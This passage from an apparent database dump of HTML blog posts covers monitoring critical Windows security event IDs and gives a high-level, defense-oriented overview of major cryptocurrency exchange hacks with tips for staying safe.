[&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Detect unauthorized group membership changes.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Scrutinize additions to privileged user groups for possible privilege abuse.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Identify accidental or malicious additions to security-sensitive groups.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By actively tracking these events, you’ll be able to ensure only authorized personnel maintain access to sensitive systems.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. 
Event ID 1102 - Audit Log Cleared</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Clearing system logs might seem like legitimate maintenance, but malicious actors often clear audit logs to cover their tracks after breaching the system.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Monitor this Event?</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Identify attempts to erase activity records for malicious purposes.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Detect unexpected log clearances and investigate further.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Mitigate the risks of unauthorized tampering with your <b><strong class=\"font-bold\">Windows Security Log</strong></b>.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By setting alerts for this event, you can act fast to identify suspicious log-clearing behavior.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. Event ID 4740 - User Account Locked Out</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Locked-out accounts can signify a <b><strong class=\"font-bold\">brute-force attack</strong></b> or a user’s accidental oversight. 
Either way, Event ID 4740 should be consistently monitored to secure your environment.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Monitor this Event?</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Identify ongoing brute-force password guessing attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Protect legitimate users from being locked out due to configuration issues.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Account lockouts often signal an attempt to exploit vulnerabilities—make sure to investigate each occurrence.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. 
Event ID 4663 - Attempt to Access Object</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Event ID 4663 logs unauthorized attempts to <b><strong class=\"font-bold\">access sensitive files or folders</strong></b>, and is critical for protecting data integrity and system confidentiality.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Monitor this Event?</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Detect any file or folder access attempts that are outside of normal permissions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Prevent unauthorized individuals from compromising sensitive business files.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Monitoring this event ID provides an additional layer of protection against unauthorized access to critical files.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Monitoring Windows Security Logs</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To effectively monitor these <b><strong class=\"font-bold\">critical Windows security event IDs</strong></b>, incorporate the following best practices:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] 
[&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Set up Strong Audit Policies</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ensure your logs are configured to capture relevant event IDs. Without proper audit policies, critical events might not even be logged.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Implement Log Aggregation Tools</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Use a centralized logging solution, such as SIEM tools, to aggregate, monitor, and analyze event logs across multiple resources in one dashboard.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Establish Monitoring Alerts</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Set alerts for the most suspicious single-occurrence activities, including log clearance attempts or failed login attempts.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Analyze Frequency Patterns Regularly</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Establish a baseline frequency for 
standard activities. Use this data to identify any unusual surges that could signal malicious intent.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"5\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Leverage Advanced AI Tools</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For efficient monitoring, use AI-powered cybersecurity solutions to detect abnormal behavior faster and more accurately.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"6\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\"><b><strong class=\"font-bold\">Educate Your Team</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ensure your IT and security team understands these event IDs and why they’re critical. Equip them with the knowledge to act swiftly when red flags arise.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Elevate Your Security Posture with Comprehensive Monitoring</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding and monitoring these <b><strong class=\"font-bold\">Windows Security Event IDs</strong></b> is essential for maintaining a robust cybersecurity framework. 
Proactive log monitoring can help you identify and neutralize threats before they impact your <b><strong class=\"font-bold\">crypto security</strong></b> or business operations.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Keep your Windows environment secure, safeguard your data’s integrity, and maintain operational continuity by focusing on these eight key event IDs. Trust us when we say your proactive efforts will pay off in long-term protection.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For more insightful tips on tightening your <b><strong class=\"font-bold\">cybersecurity posture</strong></b> and leveraging event IDs to your advantage, bookmark this page or explore our resources!</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 03:28:16', '2026-01-12 21:41:44', 'Information Security', 'The 8 Most Critical Windows Security Event IDs You Need to Monitor', '', NULL),
(121, 'Top Cryptocurrency Hacks: Lessons in Cybersecurity', 'top-cryptocurrency-hacks-lessons-in-cybersecurity', 'The cryptocurrency space has seen tremendous growth over the years, revolutionizing finance and attracting millions of users. But with great opportunities come significant risks, as the rise of crypto-related cyberattacks has shown. From major exchanges to individual wallet holders, these hacks target vulnerabilities and highlight the need for stronger security in the blockchain ecosystem. This blog will explore some of the most significant crypto hacks in history, explain how they happened, and provide actionable insights to improve crypto security. By learning from these incidents, you can better protect your investments and safeguard your digital assets.\r\n\r\nThe cryptocurrency industry has experienced several significant security breaches over the years. These incidents highlight the critical need for robust cybersecurity measures to protect digital assets. Below is a snapshot of some of the largest hacks in the cryptocurrency space:\r\n\r\n<hr />\r\n\r\n<table>\r\n<thead>\r\n<tr>\r\n<th><strong>Platform</strong></th>\r\n<th><strong>Date of Hack</strong></th>\r\n<th><strong>Method</strong></th>\r\n<th><strong>Value Stolen</strong></th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><strong>Poly Network #1</strong></td>\r\n<td>August 2021</td>\r\n<td>Targeted System Vulnerability: Brute Force</td>\r\n<td>$610M</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Coincheck #2</strong></td>\r\n<td>January 2018</td>\r\n<td>Phishing Malware</td>\r\n<td>$533M</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Mt. 
Gox #3</strong></td>\r\n<td>2011 – 2014</td>\r\n<td>Various</td>\r\n<td>$470M</td>\r\n</tr>\r\n<tr>\r\n<td><strong>The Wormhole #4</strong></td>\r\n<td>February 2022</td>\r\n<td>Targeted System Vulnerability</td>\r\n<td>$321M</td>\r\n</tr>\r\n<tr>\r\n<td><strong>KuCoin #5</strong></td>\r\n<td>September 2020</td>\r\n<td>Unknown</td>\r\n<td>$281M</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Bitmart #6</strong></td>\r\n<td>December 2021</td>\r\n<td>Unknown</td>\r\n<td>$196M</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Bitfinex #7</strong></td>\r\n<td>August 2016</td>\r\n<td>Unknown</td>\r\n<td>$72M</td>\r\n</tr>\r\n<tr>\r\n<td><strong>The DAO #8</strong></td>\r\n<td>May 2016</td>\r\n<td>System Bug</td>\r\n<td>$70M</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Major Crypto Hacks and How They Happened</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. 
Poly Network Hack (August 2021)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Method</strong></b>: Exploiting System Vulnerability</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Value Stolen</strong></b>: $610M</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">What Happened?</strong></b> Hackers targeted a vulnerability in Poly Network\'s cross-chain interoperability protocol, allowing them to override instructions within the smart contract and transfer funds to their accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">How to Stay Safe</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Conduct thorough code audits on smart contracts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Use multi-signature wallets to prevent unauthorized transactions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Regularly update systems to patch vulnerabilities.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] 
[&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Coincheck Hack (January 2018)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Method</strong></b>: Phishing Malware</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Value Stolen</strong></b>: $533M</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">What Happened?</strong></b> Cybercriminals infiltrated Coincheck’s systems using phishing tactics. Once inside, they gained access to a wallet containing NEM tokens.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">How to Stay Safe</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Educate staff on identifying phishing emails and tactics.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Use robust email security solutions to prevent unauthorized access.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Implement multi-factor authentication (MFA) for sensitive operations.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] 
pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Mt. Gox Hack (2011-2014)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Method</strong></b>: Various Breaches</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Value Stolen</strong></b>: $470M</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">What Happened?</strong></b> Over several years, attackers exploited multiple weak points in Mt. Gox\'s system, including poor security practices. 
These breaches led to the loss of hundreds of millions of dollars in Bitcoin.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">How to Stay Safe</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Conduct regular security audits to evaluate and strengthen protocols.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Store the majority of funds in cold wallets (offline storage).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Use real-time transaction monitoring to detect suspicious activity.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. 
The Wormhole Hack (February 2022)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Method</strong></b>: Exploiting Vulnerability in Bridge Protocol</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Value Stolen</strong></b>: $321M</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">What Happened?</strong></b> Hackers targeted a vulnerability in the Wormhole bridge, which connects different blockchains. They managed to mint Wormhole-wrapped Ether (wETH) without depositing the equivalent value.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">How to Stay Safe</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Rigorously test smart contracts through comprehensive audits.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Collaborate with external experts using bug bounty programs to uncover vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Have contingency plans in place to respond quickly to breaches.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 
leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. KuCoin Hack (September 2020)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Method</strong></b>: Unknown</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Value Stolen</strong></b>: $281M</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">What Happened?</strong></b> Hackers accessed KuCoin’s hot wallets and stole a substantial amount of cryptocurrency. The exact attack method is still unclear.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">How to Stay Safe</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Restrict access to hot wallets and store the majority of funds in cold wallets.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Use advanced threat detection systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Incorporate multi-layered security protocols for added protection.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 
leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Bitmart Hack (December 2021)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Method</strong></b>: Unknown</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Value Stolen</strong></b>: $196M</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">What Happened?</strong></b> Similar to the KuCoin hack, attackers withdrew significant amounts from Bitmart’s hot wallets, though the specific method remains unknown.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">How to Stay Safe</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Strong encryption and secure wallet systems should be in place.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Regular penetration testing can help detect and prevent vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Maintain a robust incident response plan to limit potential losses.</li>\r\n</ul>\r\n<h3 
